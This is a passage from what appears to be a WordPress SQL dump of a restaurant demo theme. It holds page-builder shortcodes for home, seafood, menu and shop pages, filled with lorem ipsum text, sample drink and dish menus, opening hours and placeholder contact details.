height=\"40px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 50%\" line_length=\"20px\" title=\"Appetizer\"][/mkdf_section_title][vc_column_text css=\".vc_custom_1533043390970{padding-top: 4px !important;}\"]Small Snacks\n(bruscetti with yellow caviar)[/vc_column_text][vc_empty_space height=\"40px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 50%\" line_length=\"20px\" title=\"Lunch\"][/mkdf_section_title][vc_column_text css=\".vc_custom_1533043398297{padding-top: 4px !important;}\"]Tuesday to Saturday\n6pm - 10:30pm (last order)[/vc_column_text][vc_empty_space height=\"40px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 50%\" line_length=\"20px\" title=\"Dinner\"][/mkdf_section_title][vc_column_text css=\".vc_custom_1533043409686{padding-top: 4px !important;}\"]Tuesday to Saturday\n12pm - 2:30pm (last order)[/vc_column_text][vc_empty_space height=\"40px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 50%\" line_length=\"20px\" title=\"Dessert\"][/mkdf_section_title][vc_column_text css=\".vc_custom_1533043430614{padding-top: 4px !important;}\"]Mint Parfait\n(ice cream, white chocolate mousse\nand spices)[/vc_column_text][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column width=\"1/12\" css=\".vc_custom_1535459248703{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column width=\"1/2\" css=\".vc_custom_1533027694804{margin-top: -120px !important;}\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"168\" image_size=\"full\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1533813662568{padding-top: 39% !important;padding-right: 31% !important;}\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"169\" image_size=\"full\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column width=\"1/2\" css=\".vc_custom_1534936187501{margin-top: -97px !important;padding-left: 12% !important;}\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"170\" image_size=\"full\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1533029626211{padding-top: 30px !important;}\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"171\" image_size=\"full\"][vc_empty_space height=\"40px\"][/vc_column][/vc_row][vc_row content_placement=\"top\" row_content_width=\"grid\" content_text_aligment=\"center\"][vc_column width=\"1/2\" css=\".vc_custom_1537283902655{margin-top: -125px !important;}\" offset=\"vc_col-lg-7 vc_col-md-7\" el_class=\"mkdf-reveal-from-top\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"20px 0 -10px 50%\" line_length=\"45px\" title=\"Reservations\"][/mkdf_section_title][contact-form-7 id=\"831\"][/vc_column][vc_column width=\"5/12\" css=\".vc_custom_1536848053140{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_hidden-sm vc_hidden-xs\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"36% 0 0 24%\" item_padding_1367_1600=\"36% 0 0 24%\" item_padding_1025_1366=\"36% 0 0 18%\" item_padding_769_1024=\"36% 0 0 16%\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" title=\"Book private dining &amp; banquet rooms\" text=\"Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus sed odio sit amet a sit natoque penatibus.\" line_length=\"0px\" text_margin=\"23\" text_right_padding=\"80px\"]Lorem ipsum dolor sit amet, consectetuer adipiscing elit aenean commodo ligula eget dolor nullam quis velit ante.[/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534147387272{padding-top: 120px !important;padding-bottom: 120px !important;}\"][vc_column][mkdf_portfolio_slider enable-center=\"yes\" enable-auto-width=\"no\" number_of_columns=\"one\" space_between_items=\"no\" image_proportions=\"full\" orderby=\"date\" order=\"ASC\" enable_fullheight=\"no\" portfolio_slider_full_height_decrease=\"yes\" item_style=\"gallery-overlay\" title_tag=\"h5\" enable_category=\"no\" enable_loop=\"yes\" enable_autoplay=\"yes\" enable_navigation=\"yes\" enable_navigation_numbers=\"yes\" navigation_number_position=\"outer\" enable_pagination=\"no\" enable_mousewheel_scroll=\"no\" category=\"meals\"][/vc_column][/vc_row][vc_row content_placement=\"top\" row_content_width=\"grid\"][vc_column width=\"2/3\" css=\".vc_custom_1534151757973{padding-right: 0px !important;}\" offset=\"vc_col-lg-4 vc_col-md-8\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"h3\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" title=\"Attika Fine Dining Restaurant\" text=\"Rainbow Ridge Dr street 35\nNY City, NY\" line_length=\"0px\" text_margin=\"18\" title_break_words=\"1,2,3\"]Rainbow Ridge Dr street 35\nNY City, NY[/mkdf_section_title][vc_empty_space height=\"50px\"][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1534151543242{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-offset-0 vc_col-lg-2 vc_col-md-offset-0 vc_col-md-4 vc_col-sm-offset-0 vc_col-xs-offset-1\"][vc_column_text]Phone:\n\n<a href=\"tel:+445135340089\">+445135340089</a>\n<a href=\"tel:+4540183293763\">+4540183 293763</a>\n<a href=\"tel:+4543382748123\">+454 338 2748123</a>\n\n[vc_empty_space height=\"18px\"]\n\nEmail:\n\n<a href=\"mailto:info@attikarestaurant.ny\">info@attikarestaurant.ny</a>\n<a href=\"mailto:info@attika.ny\">info@attika.ny</a>[/vc_column_text][vc_empty_space height=\"50px\"][/vc_column][vc_column width=\"1/12\" css=\".vc_custom_1534150759198{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column][vc_column css=\".vc_custom_1534151021205{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-5 vc_col-md-12\"][mkdf_google_map snazzy_map_style=\"yes\" address1=\"Brit Sec Limited, 99 Bishopsgate, London EC2M 3XD, UK\" zoom=\"18\" map_height=\"270\" pin=\"224\" snazzy_map_code=\"`{`\n{\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#f5f5f5``\n}\n`}`\n},\n{\n``elementType``: ``labels.icon``,\n``stylers``: `{`\n{\n``visibility``: ``off``\n}\n`}`\n},\n{\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#616161``\n}\n`}`\n},\n{\n``elementType``: ``labels.text.stroke``,\n``stylers``: `{`\n{\n``color``: ``#f5f5f5``\n}\n`}`\n},\n{\n``featureType``: ``administrative.land_parcel``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#bdbdbd``\n}\n`}`\n},\n{\n``featureType``: ``poi``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#eeeeee``\n}\n`}`\n},\n{\n``featureType``: ``poi``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#757575``\n}\n`}`\n},\n{\n``featureType``: ``poi.park``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#e5e5e5``\n}\n`}`\n},\n{\n``featureType``: ``poi.park``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#9e9e9e``\n}\n`}`\n},\n{\n``featureType``: ``road``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#ffffff``\n}\n`}`\n},\n{\n``featureType``: ``road.arterial``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#757575``\n}\n`}`\n},\n{\n``featureType``: ``road.highway``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#dadada``\n}\n`}`\n},\n{\n``featureType``: ``road.highway``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#616161``\n}\n`}`\n},\n{\n``featureType``: ``road.local``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#9e9e9e``\n}\n`}`\n},\n{\n``featureType``: ``transit.line``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#e5e5e5``\n}\n`}`\n},\n{\n``featureType``: ``transit.station``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#eeeeee``\n}\n`}`\n},\n{\n``featureType``: ``water``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#c9c9c9``\n}\n`}`\n},\n{\n``featureType``: ``water``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#9e9e9e``\n}\n`}`\n}\n`}`\"][/vc_column][/vc_row][vc_row content_placement=\"top\" row_content_width=\"grid\" css=\".vc_custom_1534152695378{padding-top: 65px !important;padding-bottom: 160px !important;}\"][vc_column width=\"7/12\"][mkdf_instagram_list number_of_columns=\"three\" space_between_columns=\"normal\" image_size=\"standard_resolution\" slider_loop=\"yes\" slider_autoplay=\"yes\" slider_navigation=\"yes\" slider_pagination=\"no\" number_of_photos=\"6\"][/vc_column][vc_column width=\"1/12\" css=\".vc_custom_1534163280454{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column][vc_column width=\"5/12\" offset=\"vc_col-lg-4 vc_col-md-5\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"h3\" disable_break_words=\"no\" title=\"Follow us on instagram\" line_length=\"0px\" title_break_words=\"1,3\"][/mkdf_section_title][vc_empty_space height=\"10px\"][mkdf_icon icon_pack=\"simple_line_icons\" simple_line_icon=\"icon-social-instagram\" type=\"mkdf-circle\" target=\"_blank\" custom_size=\"25\" icon_color=\"#111111\" background_color=\"#faf5f0\" link=\"https://www.instagram.com/attika.mikado/\" shape_size=\"85\" hover_icon_color=\"#a1a1a1\"][/vc_column][/vc_row]','Restaurant Home','','publish','closed','closed','','restaurant-home','','','2018-07-30 15:00:18','2018-07-30 15:00:18','',0,'http://attika.mikado-themes.com/?page_id=84',0,'page','',0),(3042,1,'2018-08-01 10:55:47','2018-08-01 10:55:47','[vc_row content_text_aligment=\"center\"][vc_column css=\".vc_custom_1535379851915{margin-bottom: -90px !important;padding-top: 80px !important;}\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"1633\" image_size=\"full\"][/vc_column][/vc_row][vc_row disable_background_image=\"\" simple_background_image=\"1509\" background_image_position=\"top center\"][vc_column][vc_row_inner row_content_width=\"grid\" content_text_aligment=\"right\" css=\".vc_custom_1537284312649{padding-top: 130px !important;padding-bottom: 130px !important;}\"][vc_column_inner width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-2 vc_col-md-8 vc_col-sm-offset-1 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 20% 0 0\" item_padding_1367_1600=\"0 20% 0 0\" item_padding_1025_1366=\"0 17% 0 0\" item_padding_769_1024=\"0 15% 0 0\" item_padding_681_768=\"0 15% 0 0\" item_padding_680=\"0 0% 0 0\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" title=\"Our History\" text=\"Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Aliquam lorem ante, dapibus in, viverra quis, feugiat a, tellus. Phasellus viverra nulla ut metus varius laoreet. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum.\" line_margin=\"50px 10% 0 15%\" text_margin=\"43\" title_break_words=\"1\"]Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum. Nam quam nunc, blandit vel, luctus pulvinar, hendrerit id, lorem. Maecenas nec odio et ante tincidunt tempus etiam.[vc_empty_space height=\"30px\"]Curabitur ullamcorper ultricies nisi. Nam eget dui. Etiam rhoncus. Maecenas tempus, tellus eget condimentum nam rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum.[/mkdf_section_title][vc_empty_space height=\"70px\"][mkdf_button type=\"simple\" text=\"See More\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\"][vc_empty_space height=\"80px\"][mkdf_team type=\"info-on-image\" team_name_tag=\"\" team_social_icon_pack=\"\" team_name=\"Atticus Finch\" team_position=\"fisherman &amp; owner\" team_image=\"1106\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][mkdf_image_gallery type=\"masonry\" enable_image_shadow=\"no\" image_behavior=\"custom-link\" number_of_columns=\"four\" space_between_items=\"normal\" images=\"970,971,972,973\" image_size=\"full\" custom_links=\"http://attika.mikado-themes.com/portfolio-item/h1-1/, http://attika.mikado-themes.com/portfolio-item/h1-2/, http://attika.mikado-themes.com/portfolio-item/h1-3/, http://attika.mikado-themes.com/portfolio-item/h1-4/\"][/vc_column_inner][/vc_row_inner][vc_row_inner row_content_width=\"grid\" content_text_aligment=\"right\" css=\".vc_custom_1534432930786{padding-top: 130px !important;padding-bottom: 130px !important;}\"][vc_column_inner width=\"2/3\" offset=\"vc_col-lg-7 vc_col-md-8 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0 45%\" item_padding_1367_1600=\"0 0 0 45%\" item_padding_1025_1366=\"0 0 0 45%\" item_padding_769_1024=\"0 0 0 27%\" item_padding_681_768=\"0 0 0 14%\" item_padding_680=\"0 0 0 0%\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" title=\"Opening hours\" text=\"Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Aliquam lorem ante, dapibus in, viverra quis, feugiat a, tellus. Phasellus viverra nulla ut metus varius laoreet. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum.\" line_margin=\"50px 10% 0 15%\" text_margin=\"23\" title_break_words=\"1\"]\n<h5>Monday</h5>\n12pm - 2:30pm (your last order)\n\n[vc_empty_space height=\"5px\"]\n<h5>Tuesday</h5>\nWe’re closed\n\n[vc_empty_space height=\"5px\"]\n<h5>Wednesday</h5>\n12pm - 2:30pm (your last order)\n\n[vc_empty_space height=\"5px\"]\n<h5>Thursday</h5>\n6pm - 10:30pm (your last order)\n\n[vc_empty_space height=\"5px\"]\n<h5>Friday</h5>\n6pm - 10:30pm (your last order)\n\n[vc_empty_space height=\"5px\"]\n<h5>Saturday</h5>\n6pm - 10:30pm (your last order)\n\n[vc_empty_space height=\"5px\"]\n<h5>Sunday</h5>\n6pm - 10:30pm (your last order)[/mkdf_section_title][vc_empty_space height=\"70px\"][mkdf_button type=\"simple\" text=\"Book a table\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner width=\"1/3\" offset=\"vc_col-lg-5 vc_col-md-4 vc_hidden-xs\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][mkdf_image_gallery type=\"masonry\" enable_image_shadow=\"no\" image_behavior=\"custom-link\" number_of_columns=\"four\" space_between_items=\"normal\" images=\"988,989,990,991\" image_size=\"full\" custom_links=\"http://attika.mikado-themes.com/portfolio-item/h1-1/, http://attika.mikado-themes.com/portfolio-item/h1-2/, http://attika.mikado-themes.com/portfolio-item/h1-3/, http://attika.mikado-themes.com/portfolio-item/h1-4/\"][/vc_column_inner][/vc_row_inner][vc_row_inner row_content_width=\"grid\" content_text_aligment=\"right\" css=\".vc_custom_1534433450023{padding-top: 130px !important;padding-bottom: 130px !important;}\"][vc_column_inner width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-2 vc_col-md-8 vc_col-sm-offset-1 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 35% 0 0\" item_padding_1367_1600=\"0 35% 0 0\" item_padding_1025_1366=\"0 35% 0 0\" item_padding_769_1024=\"0 15% 0 0\" item_padding_681_768=\"0 15% 0 0\" item_padding_680=\"0 0% 0 0\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" title=\"Our Menu\" text=\"Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Aliquam lorem ante, dapibus in, viverra quis, feugiat a, tellus. Phasellus viverra nulla ut metus varius laoreet. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum.\" line_margin=\"50px 10% 0 15%\" text_margin=\"23\" title_break_words=\"1\"]\n<h5>DRINK</h5>\nMatcha latte\nWhite wine\nMatcha latte drink drink\nWhite wine\n\n[vc_empty_space height=\"10px\"]\n<h5>APPETIZER</h5>\nSmall Snacks\n(bruscetti with yellow caviar)\nSmall Snacks\n(mozzarella bruscetti with yellow caviar)\n\n[vc_empty_space height=\"10px\"]\n<h5>LUNCH</h5>\nTuesday to Saturday\n6pm - 10:30pm (last order) Tuesday to Saturday\n6pm - 10:30pm (last order) to Saturday\n6pm - 10:30pm\n(bruscetti with yellow caviar)\n\n[vc_empty_space height=\"10px\"]\n<h5>DESSERT</h5>\nMint Parfait\n(ice cream, white chocolate mousse\nand spices)[/mkdf_section_title][vc_empty_space height=\"70px\"][mkdf_button type=\"simple\" text=\"See More\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][vc_row_inner row_content_width=\"grid\" css=\".vc_custom_1535633159717{padding-bottom: 200px !important;}\"][vc_column_inner width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-2 vc_col-md-8 vc_col-sm-offset-1 vc_col-xs-12\"][mkdf_image_with_text enable_image_shadow=\"no\" title_tag=\"\" image=\"1525\" image_size=\"full\" title=\"Oysters with lemon\" text=\"fisherman &amp; owner\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row content_text_aligment=\"center\"][vc_column css=\".vc_custom_1534515728554{margin-top: -90px !important;margin-bottom: -90px !important;}\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"1527\" image_size=\"full\"][/vc_column][/vc_row][vc_row disable_background_image=\"\" simple_background_image=\"1625\" background_image_position=\"top\"][vc_column][vc_empty_space height=\"230px\"][/vc_column][/vc_row]','Seafood Restaurant','','publish','closed','closed','','seafood-restaurant','','','2018-08-01 10:55:47','2018-08-01 10:55:47','',0,'http://attika.mikado-themes.com/?page_id=290',0,'page','',0),(3043,1,'2018-08-02 10:54:03','2018-08-02 10:54:03','[vc_row full_height=\"yes\" parallax_background_image=\"352\" parallax_bg_speed=\"0\"][vc_column][vc_row_inner row_content_width=\"grid\"][vc_column_inner css=\".vc_custom_1533285714962{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-6 vc_col-md-8\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item background_color=\"rgba(255,255,255,0.9)\" item_padding=\"18% 12% 0\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"\" disable_break_words=\"no\" title=\"Drinks menu\" title_break_words=\"1\" line_length=\"0px\"][/mkdf_section_title][vc_empty_space height=\"65px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 0\" line_length=\"20px\" title=\"Cocktails\"][/mkdf_section_title][vc_empty_space height=\"10px\"][vc_column_text]Sazerac\n(Rye, genever, demerara, and green chartreuse)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Sour\n(Scotch, cranberry grenadine, lemon, and gilka kummel)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Stirred\n(Pineapple rum, sweet vermouth, amaro lucano, and saline)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]GinTonic\n(Gins, Elske tonic syrup, and lime)[/vc_column_text][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 0\" line_length=\"20px\" title=\"Afterdinner cocktails\" title_break_words=\"1\"][/mkdf_section_title][vc_empty_space height=\"10px\"][vc_column_text]Sazerac\n(Rye, genever, demerara, and green chartreuse)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Sour\n(Scotch, cranberry grenadine, lemon, and gilka kummel)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Stirred\n(Pineapple rum, sweet vermouth, amaro lucano, and saline)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]GinTonic\n(Gins, Elske tonic syrup, and lime)[/vc_column_text][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 0\" line_length=\"20px\" title=\"Wine\" title_break_words=\"1\"][/mkdf_section_title][vc_empty_space height=\"10px\"][vc_column_text]Aubry 1er Cru Brut\nFrance (Champagne) Chardonnay, Pinot Noir[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Chateau Marguii Rose 2016\nFrance (Provence) Cinsault, Grenache[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Clos Tue Boeuf \'Petit Blanc\' 2016\nFrance (Loire) Sauvignon Blanc[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Niepoort \'Redoma Branco\' 2015\nPortugal (Douro) Rabigato, Codéga de Larinho[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Guillot Broux \'Genievrieres\' 2015\nFrance (Burgundy) Chardonnay[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Day Wines \'Cancilla Vineyard\' 2014\nUnited States (Willamette) Pinot Noir[/vc_column_text][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 0\" line_length=\"20px\" title=\"Appetizers\" title_break_words=\"1\"][/mkdf_section_title][vc_empty_space height=\"10px\"][vc_column_text]Sazerac\n(Rye, genever, demerara, and green chartreuse)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Sour\n(Scotch, cranberry grenadine, lemon, and gilka kummel)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Stirred\n(Pineapple rum, sweet vermouth, amaro lucano, and saline)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]GinTonic\n(Gins, Elske tonic syrup, and lime)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Aubry 1er Cru Brut\nFrance (Champagne) Chardonnay, Pinot Noir[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Chateau Marguii Rose 2016\nFrance (Provence) Cinsault, Grenache[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Clos Tue Boeuf \'Petit Blanc\' 2016\nFrance (Loire) Sauvignon Blanc[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Niepoort \'Redoma Branco\' 2015\nPortugal (Douro) Rabigato, Codéga de Larinho[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Guillot Broux \'Genievrieres\' 2015\nFrance (Burgundy) Chardonnay[/vc_column_text][vc_empty_space height=\"120px\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner width=\"1/2\" offset=\"vc_col-lg-6 vc_hidden-sm vc_hidden-xs\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]','Restaurant Menu Left','','draft','closed','closed','','restaurant-menu-left','','','2020-12-05 17:55:00','2020-12-05 16:55:00','',0,'http://attika.mikado-themes.com/?page_id=351',0,'page','',0),(3044,1,'2018-08-02 13:49:13','2018-08-02 13:49:13','[yith_wcwl_wishlist]','Wishlist','','publish','closed','closed','','wishlist','','','2018-08-02 13:49:13','2018-08-02 13:49:13','',0,'http://attika.mikado-themes.com/?page_id=363',0,'page','',0),(3045,1,'2018-08-02 15:34:27','2018-08-02 15:34:27','[vc_row row_content_width=\"grid\" css=\".vc_custom_1535549530866{padding-top: 50px !important;padding-bottom: 120px !important;}\"][vc_column][mkdf_product_list info_position=\"info-below-image\" number_of_columns=\"three\" space_between_items=\"huge\" orderby=\"date\" order=\"ASC\" taxonomy_to_display=\"category\" image_size=\"\" number_of_posts=\"12\" info_bottom_margin=\"-20px\"][/vc_column][/vc_row]','Three Columns','','publish','closed','closed','','three-columns','','','2018-08-02 15:34:27','2018-08-02 15:34:27','',3034,'http://attika.mikado-themes.com/?page_id=377',0,'page','',0),(3046,1,'2018-08-02 15:49:05','2018-08-02 15:49:05','[vc_row row_content_width=\"grid\" css=\".vc_custom_1535549496113{padding-top: 50px !important;padding-bottom: 120px !important;}\"][vc_column][mkdf_product_list info_position=\"info-below-image\" number_of_columns=\"four\" space_between_items=\"huge\" orderby=\"date\" order=\"ASC\" taxonomy_to_display=\"category\" image_size=\"\" number_of_posts=\"16\" info_bottom_margin=\"-20px\"][/vc_column][/vc_row]','Four Columns','','publish','closed','closed','','four-columns','','','2018-08-02 15:49:05','2018-08-02 15:49:05','',3034,'http://attika.mikado-themes.com/?page_id=385',0,'page','',0),(3047,1,'2018-08-02 15:51:57','2018-08-02 15:51:57','[vc_row css=\".vc_custom_1535372522645{padding-right: 80px !important;padding-left: 80px !important;}\"][vc_column][mkdf_product_list info_position=\"info-below-image\" number_of_columns=\"five\" space_between_items=\"huge\" orderby=\"date\" order=\"ASC\" taxonomy_to_display=\"category\" image_size=\"\" number_of_posts=\"15\" info_bottom_margin=\"-20px\"][/vc_column][/vc_row]','Full Width','','publish','closed','closed','','full-width','','','2018-08-02 15:51:57','2018-08-02 15:51:57','',3034,'http://attika.mikado-themes.com/?page_id=387',0,'page','',0),(3048,1,'2018-08-03 08:34:38','2018-08-03 08:34:38','[vc_row full_height=\"yes\" parallax_background_image=\"419\" parallax_bg_speed=\"0\"][vc_column][vc_row_inner row_content_width=\"grid\"][vc_column_inner offset=\"vc_col-lg-5 vc_col-md-3 vc_hidden-sm vc_hidden-xs\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-7 vc_col-md-9\" css=\".vc_custom_1534510995016{padding-right: 0px !important;padding-left: 0px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item background_color=\"rgba(255,255,255,0.9)\" item_padding=\"16% 12% 0\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"\" disable_break_words=\"no\" line_length=\"0px\" title=\"Food &amp; Drinks Menu\" title_break_words=\"2,3\"][/mkdf_section_title][vc_empty_space height=\"65px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 0\" line_length=\"20px\" title=\"Cocktails\"][/mkdf_section_title][vc_empty_space height=\"10px\"][vc_column_text]Sazerac\n(Rye, genever, demerara, and green chartreuse)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Sour\n(Scotch, cranberry grenadine, lemon, and gilka kummel)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Stirred\n(Pineapple rum, sweet vermouth, amaro lucano, and saline)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]GinTonic\n(Gins, Elske tonic syrup, and lime)[/vc_column_text][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" 